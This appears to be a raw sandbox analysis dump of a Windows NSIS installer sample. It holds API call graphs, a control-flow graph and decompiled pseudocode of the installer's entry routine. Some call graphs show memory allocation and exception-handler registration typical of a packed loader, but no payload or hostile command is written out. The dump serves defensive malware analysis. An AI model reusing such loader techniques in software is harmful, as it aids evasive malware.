6470->6473 6474 405844 GetDlgItem SendMessageW 6470->6474 6471->6472 6472->6457 6475 4059c6 6472->6475 6476 405826 ShowWindow 6473->6476 6479 405833 6473->6479 6474->6457 6477 40586b SendMessageW SendMessageW 6474->6477 6478 4059e2 SendMessageW 6475->6478 6476->6479 6477->6457 6478->6478 6480 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 6478->6480 6485 4044ce SendMessageW 6479->6485 6482 405a24 SendMessageW 6480->6482 6482->6482 6483 405a4d GlobalUnlock SetClipboardData CloseClipboard 6482->6483 6483->6457 6484->6449 6485->6474 6486->6444 6947 4028de 6948 4028e6 6947->6948 6949 4028ea FindNextFileW 6948->6949 6952 4028fc 6948->6952 6950 402943 6949->6950 6949->6952 6953 40653d lstrcpynW 6950->6953 6953->6952 6954 404ce0 6955 404cf0 6954->6955 6956 404d0c 6954->6956 6965 405b81 GetDlgItemTextW 6955->6965 6957 404d12 SHGetPathFromIDListW 6956->6957 6958 404d3f 6956->6958 6961 404d29 SendMessageW 6957->6961 6962 404d22 6957->6962 6960 404cfd SendMessageW 6960->6956 6961->6958 6963 40140b 2 API calls 6962->6963 6963->6961 6965->6960 7470 37958db 7471 37958df 7470->7471 7472 3795694 2 API calls 7471->7472 7473 37950c1 7472->7473 7474 3796cd9 GetPEB 7473->7474 7475 3795952 7473->7475 7474->7475 7476 3794eda 7477 3795694 2 API calls 7476->7477 7481 3793ee9 7477->7481 7478 3797564 4 API calls 7478->7481 7479 3790903 7480 3794bd0 2 API calls 7480->7481 7481->7478 7481->7479 7481->7480 7482 379812b RtlAddVectoredExceptionHandler 7481->7482 7483 37950c1 7481->7483 7484 3794b2b 7481->7484 7486 379425b 7481->7486 7482->7481 7487 3796cd9 GetPEB 7483->7487 7490 3796a96 7483->7490 7485 379812b RtlAddVectoredExceptionHandler 7484->7485 7488 3794b3c 7485->7488 7489 3794f3f 2 API calls 7486->7489 7487->7490 7491 379812b RtlAddVectoredExceptionHandler 7488->7491 7495 379427a 7489->7495 7492 3794b4a 7491->7492 7493 379812b RtlAddVectoredExceptionHandler 7492->7493 7494 3794b80 7493->7494 7496 379812b RtlAddVectoredExceptionHandler 7494->7496 7495->7483 7497 379812b RtlAddVectoredExceptionHandler 7495->7497 7498 3794bb8 7496->7498 7499 3794497 7497->7499 7499->7484 7500 379096b 7499->7500 7501 379812b RtlAddVectoredExceptionHandler 7499->7501 7502 37945b5 7501->7502 7502->7484 7503 379812b RtlAddVectoredExceptionHandler 7502->7503 7504 3794749 7503->7504 7504->7484 7505 37950c1 GetPEB 7504->7505 7506 3794992 7505->7506 7506->7483 7506->7484 7507 37949eb 7506->7507 7508 379812b RtlAddVectoredExceptionHandler 7507->7508 7509 3794a2b 7508->7509 7509->7484 7510 379812b RtlAddVectoredExceptionHandler 7509->7510 7511 3794a96 7510->7511 7511->7484 7512 3794ac6 7511->7512 7513 379812b RtlAddVectoredExceptionHandler 7512->7513 7514 3794afc 7513->7514 7515 379812b RtlAddVectoredExceptionHandler 7514->7515 7516 3794b2a 7515->7516 6966 402aeb 6967 402d84 17 API calls 6966->6967 6968 402af1 6967->6968 6969 40657a 17 API calls 6968->6969 6970 40292e 6968->6970 6969->6970 6971 4026ec 6972 402d84 17 API calls 6971->6972 6979 4026fb 6972->6979 6973 402838 6974 402745 ReadFile 6974->6973 6974->6979 6975 4060b0 ReadFile 6975->6979 6976 402785 MultiByteToWideChar 6976->6979 6977 40283a 6984 406484 wsprintfW 6977->6984 6978 40610e 5 API calls 6978->6979 6979->6973 6979->6974 6979->6975 6979->6976 6979->6977 6979->6978 6981 4027ab SetFilePointer MultiByteToWideChar 6979->6981 6982 40284b 6979->6982 6981->6979 6982->6973 6983 40286c SetFilePointer 6982->6983 6983->6973 6984->6973 6985 37901cd 6986 3795694 2 API calls 6985->6986 6987 37901fe 6986->6987 6988 3796a18 GetPEB 6987->6988 6989 3790212 6988->6989 6990 3796a18 GetPEB 6989->6990 6991 3790224 6990->6991 6995 3796a18 6991->6995 6996 3790234 6991->6996 6993 3796cd9 GetPEB 6994 3796a96 6993->6994 6995->6993 6995->6994 6997 379812b RtlAddVectoredExceptionHandler 6996->6997 6998 3790251 6997->6998 6998->6995 7517 4023f4 7518 402da6 17 API calls 7517->7518 7519 402403 7518->7519 7520 402da6 17 API calls 7519->7520 7521 40240c 7520->7521 7522 402da6 17 API calls 7521->7522 7523 402416 GetPrivateProfileStringW 7522->7523 6999 4014f5 SetForegroundWindow 7000 402c2a 6999->7000 7524 401ff6 7525 402da6 17 API calls 7524->7525 7526 401ffd 7525->7526 7527 406873 2 API calls 7526->7527 7528 402003 7527->7528 7530 402014 7528->7530 7531 406484 wsprintfW 7528->7531 7531->7530 7001 4022ff 7002 402da6 17 API calls 7001->7002 7003 402305 7002->7003 7004 402da6 17 API calls 7003->7004 7005 40230e 7004->7005 7006 402da6 17 API calls 7005->7006 7007 402317 7006->7007 7008 406873 2 API calls 7007->7008 7009 402320 7008->7009 7010 402331 lstrlenW lstrlenW 7009->7010 7014 402324 7009->7014 7012 40559f 24 API calls 7010->7012 7011 40559f 24 API calls 7015 40232c 7011->7015 7013 40236f SHFileOperationW 7012->7013 7013->7014 7013->7015 7014->7011 7014->7015 7532 4019ff 7533 402da6 17 API calls 7532->7533 7534 401a06 7533->7534 7535 402da6 17 API calls 7534->7535 7536 401a0f 7535->7536 7537 401a16 lstrcmpiW 7536->7537 7538 401a28 lstrcmpW 7536->7538 7539 401a1c 7537->7539 7538->7539 7016 732823e9 7017 73282453 7016->7017 7018 7328245e GlobalAlloc 7017->7018 7019 7328247d 7017->7019 7018->7017 7540 401d81 7541 401d94 GetDlgItem 7540->7541 7542 401d87 7540->7542 7544 401d8e 7541->7544 7543 402d84 17 API calls 7542->7543 7543->7544 7545 401dd5 GetClientRect LoadImageW SendMessageW 7544->7545 7546 402da6 17 API calls 7544->7546 7548 401e33 7545->7548 7550 401e3f 7545->7550 7546->7545 7549 401e38 DeleteObject 7548->7549 7548->7550 7549->7550 7551 402383 7552 40239d 7551->7552 7553 40238a 7551->7553 7554 40657a 17 API calls 7553->7554 7555 402397 7554->7555 7555->7552 7556 405b9d MessageBoxIndirectW 7555->7556 7556->7552 7557 732810e1 7563 73281111 7557->7563 7558 732812b0 GlobalFree 7559 732811d7 GlobalAlloc 7559->7563 7560 73281240 GlobalFree 7560->7563 7561 7328135a 2 API calls 7561->7563 7562 732812ab 7562->7558 7563->7558 7563->7559 7563->7560 7563->7561 7563->7562 7564 73281312 2 API calls 7563->7564 7565 7328129a GlobalFree 7563->7565 7566 7328116b GlobalAlloc 7563->7566 7567 73281381 lstrcpyW 7563->7567 7564->7563 7565->7563 7566->7563 7567->7563 7020 40248a 7021 402da6 17 API calls 7020->7021 7022 40249c 7021->7022 7023 402da6 17 API calls 7022->7023 7024 4024a6 7023->7024 7037 402e36 7024->7037 7027 402c2a 7028 4024de 7031 402d84 17 API calls 7028->7031 7035 4024ea 7028->7035 7029 402da6 17 API calls 7030 4024d4 lstrlenW 7029->7030 7030->7028 7031->7035 7032 402509 RegSetValueExW 7034 40251f RegCloseKey 7032->7034 7033 4032b4 31 API calls 7033->7032 7034->7027 7035->7032 7035->7033 7038 402e51 7037->7038 7041 4063d8 7038->7041 7042 4063e7 7041->7042 7043 4063f2 RegCreateKeyExW 7042->7043 7044 4024b6 7042->7044 7043->7044 7044->7027 7044->7028 7044->7029 7568 40498a 7569 4049b6 7568->7569 7570 4049c7 7568->7570 7629 405b81 GetDlgItemTextW 7569->7629 7572 4049d3 GetDlgItem 7570->7572 7578 404a32 7570->7578 7575 4049e7 7572->7575 7573 404b16 7627 404cc5 7573->7627 7631 405b81 GetDlgItemTextW 7573->7631 7574 4049c1 7576 4067c4 5 API calls 7574->7576 7577 4049fb SetWindowTextW 7575->7577 7581 405eb7 4 API calls 7575->7581 7576->7570 7582 404499 18 API calls 7577->7582 7578->7573 7583 40657a 17 API calls 7578->7583 7578->7627 7580 404500 8 API calls 7585 404cd9 7580->7585 7586 4049f1 7581->7586 7587 404a17 7582->7587 7588 404aa6 SHBrowseForFolderW 7583->7588 7584 404b46 7589 405f14 18 API calls 7584->7589 7586->7577 7593 405e0c 3 API calls 7586->7593 7590 404499 18 API calls 7587->7590 7588->7573 7591 404abe CoTaskMemFree 7588->7591 7592 404b4c 7589->7592 7594 404a25 7590->7594 7595 405e0c 3 API calls 7591->7595 7632 40653d lstrcpynW 7592->7632 7593->7577 7630 4044ce SendMessageW 7594->7630 7597 404acb 7595->7597 7600 404b02 SetDlgItemTextW 7597->7600 7604 40657a 17 API calls 7597->7604 7599 404a2b 7602 40690a 5 API calls 7599->7602 7600->7573 7601 404b63 7603 40690a 5 API calls 7601->7603 7602->7578 7615 404b6a 7603->7615 7606 404aea lstrcmpiW 7604->7606 7605 404bab 7633 40653d lstrcpynW 7605->7633 7606->7600 7607 404afb lstrcatW 7606->7607 7607->7600 7609 404bb2 7610 405eb7 4 API calls 7609->7610 7611 404bb8 GetDiskFreeSpaceW 7610->7611 7613 404bdc MulDiv 7611->7613 7616 404c03 7611->7616 7613->7616 7614 405e58 2 API calls 7614->7615 7615->7605 7615->7614 7615->7616 7617 404c74 7616->7617 7619 404e0f 20 API calls 7616->7619 7618 404c97 7617->7618 7620 40140b 2 API calls 7617->7620 7634 4044bb KiUserCallbackDispatcher 7618->7634 7621 404c61 7619->7621 7620->7618 7623 404c76 SetDlgItemTextW 7621->7623 7624 404c66 7621->7624 7623->7617 7626 404d46 20 API calls 7624->7626 7625 404cb3 7625->7627 7628 4048e3 SendMessageW 7625->7628 7626->7617 7627->7580 7628->7627 7629->7574 7630->7599 7631->7584 7632->7601 7633->7609 7634->7625 7635 37950a9 GetPEB 7045 401491 7046 40559f 24 API calls 7045->7046 7047 401498 7046->7047 7048 402891 7049 402898 7048->7049 7052 402ba9 7048->7052 7050 402d84 17 API calls 7049->7050 7051 40289f 7050->7051 7053 4028ae SetFilePointer 7051->7053 7053->7052 7054 4028be 7053->7054 7056 406484 wsprintfW 7054->7056 7056->7052 7636 3790ca8 7637 3795694 2 API calls 7636->7637 7638 3790cd1 7637->7638 7639 3796a18 GetPEB 7638->7639 7640 3790cde 7639->7640 7641 402f93 7642 402fa5 SetTimer 7641->7642 7643 402fbe 7641->7643 7642->7643 7644 403013 7643->7644 7645 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 7643->7645 7645->7644 7057 3794fad 7058 3794faf 7057->7058 7059 3796517 7058->7059 7060 3794f5d 2 API calls 7058->7060 7061 3794fb6 2 API calls 7059->7061 7060->7059 7062 3796534 7061->7062 7063 37923a0 7064 37923bf 7063->7064 7065 3795694 2 API calls 7063->7065 7065->7064 6325 403f9a 6326 403fb2 6325->6326 6327 404113 6325->6327 6326->6327 6328 403fbe 6326->6328 6329 404164 6327->6329 6330 404124 GetDlgItem GetDlgItem 6327->6330 6332 403fc9 SetWindowPos 6328->6332 6333 403fdc 6328->6333 6331 4041be 6329->6331 6339 401389 2 API calls 6329->6339 6334 404499 18 API calls 6330->6334 6335 4044e5 SendMessageW 6331->6335 6352 40410e 6331->6352 6332->6333 6336 403fe5 ShowWindow 6333->6336 6337 404027 6333->6337 6338 40414e SetClassLongW 6334->6338 6370 4041d0 6335->6370 6340 404100 6336->6340 6341 404005 GetWindowLongW 6336->6341 6342 404046 6337->6342 6343 40402f DestroyWindow 6337->6343 6344 40140b 2 API calls 6338->6344 6347 404196 6339->6347 6407 404500 6340->6407 6341->6340 6349 40401e ShowWindow 6341->6349 6345 40404b SetWindowLongW 6342->6345 6346 40405c 6342->6346 6397 404422 6343->6397 6344->6329 6345->6352 6346->6340 6350 404068 GetDlgItem 6346->6350 6347->6331 6351 40419a SendMessageW 6347->6351 6349->6337 6355 404096 6350->6355 6356 404079 SendMessageW IsWindowEnabled 6350->6356 6351->6352 6353 40140b 2 API calls 6353->6370 6354 404424 DestroyWindow EndDialog 6354->6397 6359 40409b 6355->6359 6360 4040a3 6355->6360 6363 4040ea SendMessageW 6355->6363 6364 4040b6 6355->6364 6356->6352 6356->6355 6357 404453 ShowWindow 6357->6352 6358 40657a 17 API calls 6358->6370 6404 404472 6359->6404 6360->6359 6360->6363 6362 404499 18 API calls 6362->6370 6363->6340 6366 4040d3 6364->6366 6367 4040be 6364->6367 6365 4040d1 6365->6340 6368 40140b 2 API calls 6366->6368 6369 40140b 2 API calls 6367->6369 6371 4040da 6368->6371 6369->6359 6370->6352 6370->6353 6370->6354 6370->6358 6370->6362 6388 404364 DestroyWindow 6370->6388 6398 404499 6370->6398 6371->6340 6371->6359 6373 40424b GetDlgItem 6374 404260 6373->6374 6375 404268 ShowWindow KiUserCallbackDispatcher 6373->6375 6374->6375 6401 4044bb KiUserCallbackDispatcher 6375->6401 6377 404292 EnableWindow 6382 4042a6 6377->6382 6378 4042ab GetSystemMenu EnableMenuItem SendMessageW 6379 4042db SendMessageW 6378->6379 6378->6382 6379->6382 6381 403f7b 18 API calls 6381->6382 6382->6378 6382->6381 6402 4044ce SendMessageW 6382->6402 6403 40653d lstrcpynW 6382->6403 6384 40430a lstrlenW 6385 40657a 17 API calls 6384->6385 6386 404320 SetWindowTextW 6385->6386 6387 401389 2 API calls 6386->6387 6387->6370 6389 40437e CreateDialogParamW 6388->6389 6388->6397 6390 4043b1 6389->6390 6389->6397 6391 404499 18 API calls 6390->6391 6392 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 6391->6392 6393 401389 2 API calls 6392->6393 6394 404402 6393->6394 6394->6352 6395 40440a ShowWindow 6394->6395 6396 4044e5 SendMessageW 6395->6396 6396->6397 6397->6352 6397->6357 6399 40657a 17 API calls 6398->6399 6400 4044a4 SetDlgItemTextW 6399->6400 6400->6373 6401->6377 6402->6382 6403->6384 6405 404479 6404->6405 6406 40447f SendMessageW 6404->6406 6405->6406 6406->6365 6408 4045c3 6407->6408 6409 404518 GetWindowLongW 6407->6409 6408->6352 6409->6408 6410 40452d 6409->6410 6410->6408 6411 40455a GetSysColor 6410->6411 6412 40455d 6410->6412 6411->6412 6413 404563 SetTextColor 6412->6413 6414 40456d SetBkMode 6412->6414 6413->6414 6415 404585 GetSysColor 6414->6415 6416 40458b 6414->6416 6415->6416 6417 404592 SetBkColor 6416->6417 6418 40459c 6416->6418 6417->6418 6418->6408 6419 4045b6 CreateBrushIndirect 6418->6419 6420 4045af DeleteObject 6418->6420 6419->6408 6420->6419 7646 401b9b 7647 401ba8 7646->7647 7648 401bec 7646->7648 7649 401c31 7647->7649 7654 401bbf 7647->7654 7650 401bf1 7648->7650 7651 401c16 GlobalAlloc 7648->7651 7653 40657a 17 API calls 7649->7653 7664 40239d 7649->7664 7650->7664 7667 40653d lstrcpynW 7650->7667 7652 40657a 17 API calls 7651->7652 7652->7649 7655 402397 7653->7655 7665 40653d lstrcpynW 7654->7665 7660 405b9d MessageBoxIndirectW 7655->7660 7655->7664 7658 401c03 GlobalFree 7658->7664 7659 401bce 7666 40653d lstrcpynW 7659->7666 7660->7664 7662 401bdd 7668 40653d lstrcpynW 7662->7668 7665->7659 7666->7662 7667->7658 7668->7664 7066 40149e 7067 4014ac PostQuitMessage 7066->7067 7068 40239d 7066->7068 7067->7068 7679 40259e 7680 402de6 17 API calls 7679->7680 7681 4025a8 7680->7681 7682 402d84 17 API calls 7681->7682 7683 4025b1 7682->7683 7684 4025d9 RegEnumValueW 7683->7684 7685 4025cd RegEnumKeyW 7683->7685 7687 40292e 7683->7687 7686 4025ee RegCloseKey 7684->7686 7685->7686 7686->7687 7689 4015a3 7690 402da6 17 API calls 7689->7690 7691 4015aa SetFileAttributesW 7690->7691 7692 4015bc 7691->7692 7693 401fa4 7694 402da6 17 API calls 7693->7694 7695 401faa 7694->7695 7696 40559f 24 API calls 7695->7696 7697 401fb4 7696->7697 7698 405b20 2 API calls 7697->7698 7699 401fba 7698->7699 7700 401fdd CloseHandle 7699->7700 7702 4069b5 5 API calls 7699->7702 7704 40292e 7699->7704 7700->7704 7703 401fcf 7702->7703 7703->7700 7706 406484 wsprintfW 7703->7706 7706->7700 7069 379279c 7070 37927ab 7069->7070 7071 379812b RtlAddVectoredExceptionHandler 7070->7071 7072 37928b6 7070->7072 7071->7070 7707 4021aa 7708 402da6 17 API calls 7707->7708 7709 4021b1 7708->7709 7710 402da6 17 API calls 7709->7710 7711 4021bb 7710->7711 7712 402da6 17 API calls 7711->7712 7713 4021c5 7712->7713 7714 402da6 17 API calls 7713->7714 7715 4021cf 7714->7715 7716 402da6 17 API calls 7715->7716 7717 4021d9 7716->7717 7718 402218 CoCreateInstance 7717->7718 7719 402da6 17 API calls 7717->7719 7720 402237 7718->7720 7719->7718 7721 401423 24 API calls 7720->7721 7722 4022f6 7720->7722 7721->7722 7723 403baa 7724 403bb5 7723->7724 7725 403bb9 7724->7725 7726 403bbc GlobalAlloc 7724->7726 7726->7725 6058 3795694 6059 37956a4 6058->6059 6062 379581e 6058->6062 6063 3796a18 6059->6063 6061 379571c NtAllocateVirtualMemory 6061->6062 6064 3796a8a 6063->6064 6066 3796a96 6063->6066 6067 3796cd9 GetPEB 6064->6067 6066->6061 6068 3796cee 6067->6068 6068->6066 7727 4023b2 7728 4023c0 7727->7728 7729 4023ba 7727->7729 7731 4023ce 7728->7731 7732 402da6 17 API calls 7728->7732 7730 402da6 17 API calls 7729->7730 7730->7728 7733 4023dc 7731->7733 7735 402da6 17 API calls 7731->7735 7732->7731 7734 402da6 17 API calls 7733->7734 7736 4023e5 WritePrivateProfileStringW 7734->7736 7735->7733 7078 3793b8f 7079 3793bc0 7078->7079 7080 3796cd9 GetPEB 7079->7080 7081 3790903 7079->7081 7080->7081 7082 4014b8 7083 4014be 7082->7083 7084 401389 2 API calls 7083->7084 7085 4014c6 7084->7085 7086 3795982 7087 3796a18 GetPEB 7086->7087 7088 3795992 7087->7088 7089 3796a18 GetPEB 7088->7089 7090 37959a8 7089->7090 7091 3796a18 GetPEB 7090->7091 7092 37959c3 7091->7092 7093 3796a18 GetPEB 7092->7093 7094 37959d9 7093->7094 7095 3796a18 GetPEB 7094->7095 7097 37959f1 7095->7097 7096 379812b RtlAddVectoredExceptionHandler 7096->7097 7097->7096 7098 37950c1 7097->7098 7101 3795d6b 7097->7101 7099 3796cd9 GetPEB 7098->7099 7100 3796a96 7098->7100 7099->7100 7102 379812b RtlAddVectoredExceptionHandler 7101->7102 7103 3795d7e 7102->7103 7104 379812b RtlAddVectoredExceptionHandler 7103->7104 7105 3795d8f 7104->7105

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 39 403702-403706 35->39 40 4036fd-403701 35->40 36->35 36->36 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->44 45 40386a-403882 DeleteFileW call 40307d 37->45 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 54 403722 47->54 55 40371d-403720 47->55 49 403781-4037bb 48->49 50 403767-40376c 48->50 58 4037c3-4037c5 49->58 59 4037bd-4037c1 49->59 50->49 56 40376e-403776 50->56 54->48 55->48 55->54 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->49 62->63 63->49 64->45 64->67 65->37 71 403894-4038a7 call 405e39 66->71 72 403935-40393c call 403bec 66->72 79 403a69-403a78 call 405b9d ExitProcess 67->79 80 403a7e-403a84 67->80 81 4038f9-403906 71->81 82 4038a9-4038de 71->82 78 403941-403944 72->78 78->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 105 40391c-403932 call 40653d * 2 89->105 103 40396a-403984 lstrcatW lstrcmpiW 90->103 104 40395f-403965 lstrcatW 90->104 106 403ae8-403af3 ExitWindowsEx 92->106 107 403adc-403ae6 92->107 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 109 403a57 103->109 110 40398a-40398d 103->110 104->103 105->72 106->85 108 403af5-403af7 call 40140b 106->108 107->106 107->108 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				intOrPtr* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				void* _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                
                                                				0x440000 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x434fb8 = _v324.dwBuildNumber;
                                                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x434fbe != 0x600) {
                                                					_t180 = E0040690A(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E0040689A(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E0040690A(0xb);
                                                				 *0x434f04 = E0040690A(9);
                                                				_t88 = E0040690A(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x434fc0 = _t88;
                                                				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E0040653D(0x433f00, L"NSIS Error");
                                                				E0040653D(0x440000, GetCommandLineW());
                                                				_t94 = 0x440000;
                                                				_t234 = 0x22;
                                                				 *0x434f00 = 0x400000;
                                                				if( *0x440000 == _t234) {
                                                					_t94 = 0x440002;
                                                				}
                                                				_t199 = CharNextW(E00405E39(_t94, 0x440000));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E39(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E0040653D(0x440800, _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235);
                                                										_t116 = E004034FC(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403B12();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x434f94 == _t189) {
                                                														L77:
                                                														_t120 =  *0x434fac;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E0040690A(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B9D(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x434f1c == _t189) {
                                                												L51:
                                                												 *0x434fac =  *0x434fac | 0xffffffff;
                                                												_v24 = E00403BEC(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E39(0x440000, _t189);
                                                											if(_t219 < 0x440000) {
                                                												L48:
                                                												_t264 = _t219 - 0x440000;
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < 0x440000) {
